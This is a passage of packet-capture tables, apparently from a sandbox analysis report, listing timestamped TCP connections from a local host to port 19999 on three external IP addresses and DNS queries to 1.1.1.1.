Jul 25, 2024 12:03:04.399357080 CEST	49778	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:04.399590015 CEST	49778	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:04.404678106 CEST	19999	49778	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:04.404728889 CEST	19999	49778	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:04.910857916 CEST	49778	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:04.919814110 CEST	19999	49778	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:04.919900894 CEST	49778	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:05.422136068 CEST	49779	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:05.429857016 CEST	19999	49779	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:05.429974079 CEST	49779	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:05.430093050 CEST	49779	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:05.438762903 CEST	19999	49779	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:05.440824032 CEST	19999	49779	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:05.911006927 CEST	49779	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:05.935862064 CEST	19999	49779	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:05.936045885 CEST	49779	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:06.421067953 CEST	49780	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:06.426762104 CEST	19999	49780	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:06.426870108 CEST	49780	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:06.427093983 CEST	49780	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:06.433018923 CEST	19999	49780	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:06.433868885 CEST	19999	49780	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:06.910835981 CEST	49780	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:06.934556961 CEST	19999	49780	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:06.934698105 CEST	49780	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:07.508740902 CEST	49781	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:07.513696909 CEST	19999	49781	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:07.513758898 CEST	49781	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:07.513901949 CEST	49781	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:07.519331932 CEST	19999	49781	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:07.519479036 CEST	19999	49781	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:07.911096096 CEST	49781	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:07.957933903 CEST	19999	49781	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:07.983225107 CEST	19999	49781	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:07.983268976 CEST	49781	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:08.438189030 CEST	49782	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:08.444808960 CEST	19999	49782	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:08.445066929 CEST	49782	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:08.445066929 CEST	49782	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:08.450407982 CEST	19999	49782	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:08.450472116 CEST	19999	49782	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:08.926460981 CEST	49782	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:08.932647943 CEST	19999	49782	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:08.932926893 CEST	49782	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:09.454319000 CEST	49783	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:09.460222006 CEST	19999	49783	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:09.460314035 CEST	49783	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:09.460464001 CEST	49783	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:09.467874050 CEST	19999	49783	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:09.468053102 CEST	19999	49783	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:09.942101955 CEST	49783	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:09.957778931 CEST	19999	49783	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:09.957849026 CEST	49783	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:10.456307888 CEST	49784	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:10.461165905 CEST	19999	49784	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:10.461244106 CEST	49784	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:10.461509943 CEST	49784	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:10.466418028 CEST	19999	49784	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:10.466774940 CEST	19999	49784	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:10.945143938 CEST	49784	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:10.950481892 CEST	19999	49784	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:10.950545073 CEST	49784	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:11.615618944 CEST	49785	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:11.620421886 CEST	19999	49785	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:11.620498896 CEST	49785	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:11.621032953 CEST	49785	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:11.625916958 CEST	19999	49785	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:11.625966072 CEST	19999	49785	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:12.098268986 CEST	49785	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:12.122756958 CEST	19999	49785	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:12.122848034 CEST	49785	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:12.608805895 CEST	49786	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:12.614170074 CEST	19999	49786	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:12.614278078 CEST	49786	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:12.614517927 CEST	49786	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:12.620297909 CEST	19999	49786	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:12.622127056 CEST	19999	49786	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:13.098804951 CEST	49786	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:13.122124910 CEST	19999	49786	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:13.122261047 CEST	49786	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:14.288518906 CEST	65157	19999	192.168.2.4	5.161.70.189
Jul 25, 2024 12:03:14.293894053 CEST	19999	65157	5.161.70.189	192.168.2.4
Jul 25, 2024 12:03:14.294166088 CEST	65157	19999	192.168.2.4	5.161.70.189
Jul 25, 2024 12:03:14.294166088 CEST	65157	19999	192.168.2.4	5.161.70.189
Jul 25, 2024 12:03:14.299196005 CEST	19999	65157	5.161.70.189	192.168.2.4
Jul 25, 2024 12:03:14.300012112 CEST	19999	65157	5.161.70.189	192.168.2.4
Jul 25, 2024 12:03:14.754635096 CEST	65157	19999	192.168.2.4	5.161.70.189
Jul 25, 2024 12:03:14.760193110 CEST	19999	65157	5.161.70.189	192.168.2.4
Jul 25, 2024 12:03:14.760343075 CEST	65157	19999	192.168.2.4	5.161.70.189
Jul 25, 2024 12:03:15.269087076 CEST	65158	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:15.274117947 CEST	19999	65158	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:15.274234056 CEST	65158	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:15.274579048 CEST	65158	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:15.279634953 CEST	19999	65158	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:15.280503988 CEST	19999	65158	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:15.754607916 CEST	65158	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:15.808799982 CEST	19999	65158	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:15.815634012 CEST	19999	65158	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:15.815680981 CEST	65158	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:16.279284000 CEST	65159	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:16.284286976 CEST	19999	65159	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:16.284400940 CEST	65159	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:16.284666061 CEST	65159	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:16.289629936 CEST	19999	65159	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:16.289870977 CEST	19999	65159	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:16.754633904 CEST	65159	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:16.805953026 CEST	19999	65159	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:17.021440983 CEST	19999	65159	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:17.021523952 CEST	65159	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:17.353614092 CEST	65160	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:17.360327959 CEST	19999	65160	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:17.360404968 CEST	65160	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:17.360560894 CEST	65160	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:17.367223024 CEST	19999	65160	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:17.367372990 CEST	19999	65160	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:17.848370075 CEST	65160	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:17.853972912 CEST	19999	65160	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:17.854041100 CEST	65160	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:18.377547026 CEST	65161	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:18.382411957 CEST	19999	65161	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:18.382493019 CEST	65161	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:18.382654905 CEST	65161	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:18.387464046 CEST	19999	65161	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:18.388060093 CEST	19999	65161	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:18.864507914 CEST	65161	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:18.870289087 CEST	19999	65161	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:18.871069908 CEST	65161	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:19.384439945 CEST	65162	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:19.389388084 CEST	19999	65162	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:19.389467001 CEST	65162	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:19.389615059 CEST	65162	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:19.394426107 CEST	19999	65162	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:19.394479990 CEST	19999	65162	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:19.864017963 CEST	65162	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:19.869365931 CEST	19999	65162	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:19.869442940 CEST	65162	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:21.219161987 CEST	58665	19999	192.168.2.4	5.161.70.189
Jul 25, 2024 12:03:21.224781036 CEST	19999	58665	5.161.70.189	192.168.2.4
Jul 25, 2024 12:03:21.224886894 CEST	58665	19999	192.168.2.4	5.161.70.189
Jul 25, 2024 12:03:21.225071907 CEST	58665	19999	192.168.2.4	5.161.70.189
Jul 25, 2024 12:03:21.230370998 CEST	19999	58665	5.161.70.189	192.168.2.4
Jul 25, 2024 12:03:21.230812073 CEST	19999	58665	5.161.70.189	192.168.2.4
Jul 25, 2024 12:03:21.723258018 CEST	58665	19999	192.168.2.4	5.161.70.189
Jul 25, 2024 12:03:21.728571892 CEST	19999	58665	5.161.70.189	192.168.2.4
Jul 25, 2024 12:03:21.728637934 CEST	58665	19999	192.168.2.4	5.161.70.189
Jul 25, 2024 12:03:22.264272928 CEST	58666	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:23.350529909 CEST	19999	58666	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:23.350646019 CEST	58666	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:23.453500032 CEST	58667	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:23.482388020 CEST	19999	58667	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:23.482542038 CEST	58667	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:23.482630968 CEST	58667	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:23.496537924 CEST	19999	58667	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:23.496545076 CEST	19999	58667	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:23.817991972 CEST	58667	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:23.873972893 CEST	19999	58667	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:24.031333923 CEST	19999	58667	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:24.031421900 CEST	58667	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:24.849961042 CEST	58668	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:24.854882002 CEST	19999	58668	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:24.854969978 CEST	58668	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:24.855468988 CEST	58668	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:24.860470057 CEST	19999	58668	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:24.860516071 CEST	19999	58668	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:25.332931995 CEST	58668	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:25.342864990 CEST	19999	58668	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:25.342981100 CEST	58668	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:26.006201029 CEST	58669	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:26.011415005 CEST	19999	58669	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:26.011528969 CEST	58669	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:26.011802912 CEST	58669	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:26.016788006 CEST	19999	58669	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:26.016818047 CEST	19999	58669	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:26.332736015 CEST	58669	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:26.381843090 CEST	19999	58669	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:26.831635952 CEST	19999	58669	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:26.831948042 CEST	58669	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:26.832730055 CEST	19999	58669	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:26.832793951 CEST	58669	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:26.839267969 CEST	19999	58669	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:26.846497059 CEST	58670	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:26.853914976 CEST	19999	58670	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:26.854120970 CEST	58670	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:26.854208946 CEST	58670	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:26.859097004 CEST	19999	58670	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:26.859637022 CEST	19999	58670	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:27.332782030 CEST	58670	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:27.339840889 CEST	19999	58670	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:27.339893103 CEST	58670	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:28.782239914 CEST	58671	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:28.787488937 CEST	19999	58671	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:28.787643909 CEST	58671	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:28.788269997 CEST	58671	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:28.793391943 CEST	19999	58671	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:28.793921947 CEST	19999	58671	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:29.286183119 CEST	58671	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:29.303225040 CEST	19999	58671	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:29.303287029 CEST	58671	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:30.634673119 CEST	58672	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:30.639698029 CEST	19999	58672	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:30.640099049 CEST	58672	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:30.640268087 CEST	58672	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:30.645145893 CEST	19999	58672	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:30.645370007 CEST	19999	58672	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:31.161139965 CEST	58672	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:31.168179035 CEST	19999	58672	88.198.117.174	192.168.2.4
Jul 25, 2024 12:03:31.168272018 CEST	58672	19999	192.168.2.4	88.198.117.174
Jul 25, 2024 12:03:31.679541111 CEST	58673	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:31.686259985 CEST	19999	58673	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:31.686405897 CEST	58673	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:31.686577082 CEST	58673	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:31.693135977 CEST	19999	58673	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:31.703315020 CEST	19999	58673	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:32.161135912 CEST	58673	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:32.191350937 CEST	19999	58673	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:32.191473007 CEST	58673	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:32.715934038 CEST	58674	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:32.742466927 CEST	19999	58674	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:32.742574930 CEST	58674	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:32.742811918 CEST	58674	19999	192.168.2.4	5.75.158.61
Jul 25, 2024 12:03:32.750916004 CEST	19999	58674	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:32.751723051 CEST	19999	58674	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:33.544603109 CEST	19999	58674	5.75.158.61	192.168.2.4
Jul 25, 2024 12:03:33.598150015 CEST	58674	19999	192.168.2.4	5.75.158.61

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 11:59:27.472111940 CEST	50652	53	192.168.2.4	1.1.1.1
Jul 25, 2024 11:59:27.481487989 CEST	53	50652	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:28.165363073 CEST	60665	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:28.332082033 CEST	53	60665	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:29.146353960 CEST	61223	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:29.242415905 CEST	53	61223	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:30.166480064 CEST	61051	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:30.176345110 CEST	53	61051	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:31.165967941 CEST	58149	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:31.174592018 CEST	53	58149	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:32.161283970 CEST	61706	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:32.261459112 CEST	53	61706	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:33.161194086 CEST	57052	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:33.378659010 CEST	53	57052	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:34.382622957 CEST	59244	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:34.394407988 CEST	53	59244	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:35.380345106 CEST	57420	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:35.462176085 CEST	53	57420	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:36.382529974 CEST	61341	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:36.392015934 CEST	53	61341	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:37.380928040 CEST	62335	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:37.627830029 CEST	53	62335	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:38.645776987 CEST	57342	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:38.657484055 CEST	53	57342	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:39.645586014 CEST	57789	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:39.662760973 CEST	53	57789	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:40.662950993 CEST	65426	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:40.759813070 CEST	53	65426	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:41.756216049 CEST	52037	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:41.979935884 CEST	53	52037	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:42.989684105 CEST	49252	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:42.999197960 CEST	53	49252	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:43.989581108 CEST	52321	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:44.002315044 CEST	53	52321	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:44.990056992 CEST	64757	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:44.999610901 CEST	53	64757	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:45.989835024 CEST	50024	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:46.454554081 CEST	53	50024	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:47.459814072 CEST	56848	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:47.634426117 CEST	53	56848	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:48.739620924 CEST	51723	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:48.901732922 CEST	53	51723	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:49.739975929 CEST	64457	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:49.751717091 CEST	53	64457	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:50.740645885 CEST	64114	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:51.250427961 CEST	53	64114	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:52.255629063 CEST	59051	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:52.265348911 CEST	53	59051	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:53.270745993 CEST	57307	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:53.364348888 CEST	53	57307	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:54.270809889 CEST	56339	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:54.280977964 CEST	53	56339	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:55.286232948 CEST	51673	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:55.298856974 CEST	53	51673	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:56.286535025 CEST	64961	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:56.294533968 CEST	53	64961	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:57.301881075 CEST	63350	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:57.403168917 CEST	53	63350	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:58.302088976 CEST	51326	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:58.312371016 CEST	53	51326	1.1.1.1	192.168.2.4
Jul 25, 2024 12:02:59.348089933 CEST	55243	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:02:59.358144999 CEST	53	55243	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:00.349076033 CEST	63370	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:00.366846085 CEST	53	63370	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:01.349868059 CEST	58052	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:01.512070894 CEST	53	58052	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:02.364711046 CEST	54430	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:02.373325109 CEST	53	54430	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:03.364912987 CEST	56472	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:03.376569986 CEST	53	56472	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:04.380990028 CEST	57022	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:04.391307116 CEST	53	57022	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:05.411453962 CEST	54205	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:05.421170950 CEST	53	54205	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:06.411890030 CEST	65475	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:06.419838905 CEST	53	65475	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:07.414388895 CEST	63149	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:07.507802010 CEST	53	63149	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:08.427323103 CEST	55003	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:08.436698914 CEST	53	55003	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:09.442576885 CEST	55559	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:09.453562975 CEST	53	55559	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:10.443088055 CEST	59550	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:10.452605963 CEST	53	59550	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:11.599633932 CEST	62952	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:11.609930992 CEST	53	62952	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:12.599097967 CEST	61945	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:12.607680082 CEST	53	61945	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:13.600505114 CEST	51769	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:13.691914082 CEST	51769	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:13.698661089 CEST	53	51769	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:13.771753073 CEST	53	51769	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:15.258119106 CEST	57968	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:15.268265963 CEST	53	57968	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:16.257081985 CEST	61237	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:16.265567064 CEST	53	61237	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:17.257148027 CEST	63048	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:17.348299026 CEST	63048	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:17.352531910 CEST	53	63048	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:17.356199026 CEST	53	63048	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:18.364696980 CEST	64240	53	192.168.2.4	1.1.1.1
Jul 25, 2024 12:03:18.376652002 CEST	53	64240	1.1.1.1	192.168.2.4
Jul 25, 2024 12:03:19.366615057 CEST	53462	53	192.168.2.4	1.1.1.1
